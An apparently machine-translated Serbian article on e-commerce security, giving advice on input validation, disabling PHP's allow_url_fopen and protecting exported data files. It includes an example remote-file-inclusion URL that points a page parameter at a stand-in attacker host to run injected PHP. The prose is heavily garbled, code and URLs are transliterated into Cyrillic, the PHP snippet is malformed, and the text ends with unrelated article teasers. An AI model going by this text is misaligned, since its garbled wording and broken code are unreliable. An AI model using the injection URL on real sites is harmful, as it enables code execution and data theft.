Безбедност на е-комерц сајт треба да буде главни обзир када се развија е-комерц сајт или софтвер. Програмер треба да буде свестан свих безбедносних разматрања приликом дизајнирања сајта. Е-трговина постаје баналан ових дана, број безбедносних напада свакако повећава. Параноја је здрава ствар за е-цоммерце сајт програмера, потребно је да до капије са безбедносним питањима, и чувају наше уши и очи отворене. Иако су следеће озбиљније рупе, рупе, ако након овог се лако поправити.
Доле су неке безбедносне разматрања да буде укључена када се развија сајт. Овог члана не обухвата Е-схоплифтинг, погледајте мој посебан чланак о томе.
Корисник улаз - сваког уноса, било да се унос количина, у потрази за производ, унос имена итд, треба валидација за сумњиве карактере. Ако се ово не ради, могуће је да унесете "?>", затварање крају ознаке ПХП и извршавање неких ПХП код.
То је далеко сигурније дозволити бројева и слова АЗ (велика слова укључена) и 0-9 и ништа друго, него направити листу свих знакова које не би требало да буде. Провере скрипта треба да се крећете кроз сваки карактер једног по једног. Ово треба да се постигне коришћењем провере на страни сервера, а не ЈаваСцрипт. Употреба страни сервера уноса провере од суштинског је значаја да задржи нежељене карактера
Постоји још један велики при извршавању ПХП код. Када користећи ПХП постоји подешавање названо аллоу_урл_фопен који омогућава отварање датотека из ПХП скрипта. Ово подешавање би требало да буде искључен, осим ако је апсолутно неопходно.
Замислите имате ПХП скрипте за оба фиксних заглавља и подножја, као и да приступ вашим страницама ћете уписати хттп://ууу.мысите.цом/индекс.пхп?паге=паге2. Све што је потребно је злонамерног корисника да покрене скрипту мењањем ових параметара тако да упишете префикс "хттп:// ууу.мысите.цом/индекс.пхп?паге=хттп://ууу.евилхацк.цом/хацкер.ткст" са неки ПХП код у датотеку "хацкер.ткст". Могли сте нешто деси, ПХП фајлове чита, брише, виталне информације украден.
Ако нисте сигурни да ли ова поставка се укључили или искључили, копирајте следећи ПХП код у текстуалну датотеку и поставите је на свој уеб сервер:
пхпинфо ();
>?
Када приступите свом скрипту на свој уеб сервер, треба наићи поставка аллоу_урл_фопен под конфигурацију.
Корисника рачунара, под нормалним околностима не могу наћи вредност ове поставке.
Будите пажљиви извезене податке као што су наредбе, производи у ЦСВ и МыСКЛ фајлове. Ако је ово података извезених из скрипте и чувају на Уеб серверу, односно под заједничким именом датотеке. хттп://ууу.мысите.цом/админ/оутпут_таблес.цсв. Ово је заиста само проблем када извезене податке живи у датотеке у директоријум који је јавно доступан. Постоји два начина да се спречи овај изговор безбедности - Прво су иза излазне датотеке заштићене лозинком директоријум, друго су подаци налазе унутар ХТМЛ елемента Текстареа образац на писму. Стореоунер тада може да копирате ове информације из текстфиле и креирајте нову датотеку на свом рачунару и налепите овде информацију.
Све што је потребно је хакер пронаћи ову датотеке тако што ћете се е-трговина сајту демонстрацију софтвера и потражите исте датотеке на реалном сајту.
Доле су додатне чланке везане за горе наведене чланку из "цоммерце" Члан категорији.
Особе заинтересоване у горњем чланку "Е-трговина сигурности - безбједности зачепљење рупе" су такође заинтересовани за сродних чланака наведене у наставку:
Покретање е-комерц бизнис није само о томе како Ваш сајт и покренете. Клијенти се ослањају на своје способности да им служи телефоном, факсом, е-маил, или другим средствима, и захтева да све своје системе да се раде да би могли да испуни захтеве корисника.
Само неколико дана поново сам био има цхат са мојим пријатељем. Он је прославља 1. рођендан своје бебе и да је за покретање између родном у Керала и Ченај, своје радно место. Он и његова боља половина је путовао између ова места најмање 4 пута у последњих месец дана.
Ако сте радили за е-трговину за све време, требало би да зна да постоји више од оригиналног сцамерс пружаоца услуга велепродаје дропсхип директоријум. У свету електронског пословања, Салехоо и свету брендови су и реномирани провајдери који су стекли популарност у последњих неколико година.
Ако сте икада били на сајту продавца, вероватно сте већ чули Салехоо или га чак користе за своју корист. Уколико управо почињете са посла, можда ћете бити збуњени са мешовитим Салехоо рецензије тамо. Сада, узмимо Салехоо погледамо шта је стварно и све о услугама које они нуде много теже да превиде.
Колико људи знате да сте купили нешто на мрежи? Ако ваш попут мене врло мало, зато еЦоммерце је у свету нови тржни центар. Али, ко води ове мрежи малопродајних објеката? Људи као ти и ја, зато је овај бизнис цвета и да ће наставити да сад бум и добро у будућности.
Ако сте велики обожавалац најновијих електронских производа, можда ћете бити у искушењу идејом вођења сопствене пословне електроника мрежи. Није тако тешко да бисте почели када се у потпуности искористите права пад испоруке електронских сервиса и доста су за вас избор.
Да ли сте икада отићи у свој локални Цонвениенце Сторе и питају шта то би било као када сте га у власништву? Желите ли бити добар власник, да ли ће људи као што си ти? Па овај чланак ће вам показати предности поседовања сопственог онлајн малопродајни објекат, или познатији као Е-трговина која се разликује од стварног локалног Цонвениенце Сторе.
